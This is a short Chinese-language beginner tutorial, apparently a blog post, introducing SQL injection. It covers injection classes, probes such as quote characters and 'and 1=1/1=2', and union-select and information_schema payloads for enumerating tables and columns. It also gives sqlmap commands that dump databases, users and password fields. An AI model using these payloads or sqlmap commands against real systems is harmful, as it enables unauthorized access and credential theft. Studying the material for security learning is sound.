SQL注入——小白入门预备知识
什么是SQL注入攻击:
- SQL注入(Sql Injection):是一种十分流行的脚本攻击,能严重危害数据库安全的攻击。其是将用户输入的数据作为恶意SQL语句注入的途径,拼接到数据库的SQL语句中,被当做SQL语句的一部分执行。
哪里能进行SQL注入呢?
- 任何客户端可控,传递到服务器的变量,并且和数据库进行交互,都有可能存在sql注入,如URL、用户输入栏、评论区等等。
SQL注入的分类:
1、带内(In-band)SQLi,也叫经典SQLi
2、推测SQL注入(盲注)
3、带外SQLi
(参考:https://blog.csdn.net/caiqiiqi/article/details/102987856)
检测是否存在SQL注入漏洞:
- 若想要进行SQL注入攻击当然得先查看存不存在SQL注入漏洞,我们在输入框输入单引号’或者双引号",若返回错误则存在该漏洞(提示单引号或者双引号个数不匹配);也可以通过URL传入参数:and1=1和and 1=2来进行判断,若传入and 1=1正常,输入and1=2发返回错误则存在数字型SQL注入漏洞(逻辑判断1=1为真,1=2为假);同理输入and ‘1’='1’和and ‘1’='2’进行同样的操作,判断字符型SQL注入漏洞是否存在。
必须知道的SQL语句:
1=1,1=2(判断真假);
order by X;
database(),user(),version();
union select null,null,…();
length(database())>=1;
substr(database(),1,1)=‘a’;
sleep(1);
…等等(啥意思百度一下就知道)
Information_schema库的使用:
(详细请查看https://blog.csdn.net/lxy320826/article/details/101398841)
首先,table_schema,table_name,column_name分别是库名表名列名,这是比较常用的列名;group_concat()是一个返回组的连接的函数;
我们可以通过:
- union select group_concat(table_name) from information_schema.tables
where table_schema=‘xxx’ #获得xxx数据库的表名 - union select group_concat(column_name) from
information_schema.columns where table_schema=‘xxx’ #获得xxx数据库的列名
有了表名和列名对后续的操作就方便了,想查什么就查什么。
学习并使用工具来节省时间:
(安装教程:https://blog.csdn.net/cqs394235616/article/details/106283059)
如sqlmap,其中最常用也最基础的语句:
python sqlmap.py -u URL(如http://abc.com/xxx.php?id=1) #查找注入点;
python sqlmap.py -u URL --dbs #获取所有数据库
python sqlmap.py -u URL --/users/passwords/current-user/current-db#获取数据库所有用户/密码/当前网站数据库的用户名称/当前网站数据库的名称
python sqlmap.py -u URL -D xx --tables #获取数据库xx的所有表名
python sqlmap.py -u URL -D xx -T yy --columns #获取xx数据库yy表的所有字段
python sqlmap.py -u URL -D xx -T yy -C id,username,password --dump #同理指定库名表名字段,dump出指定字段信息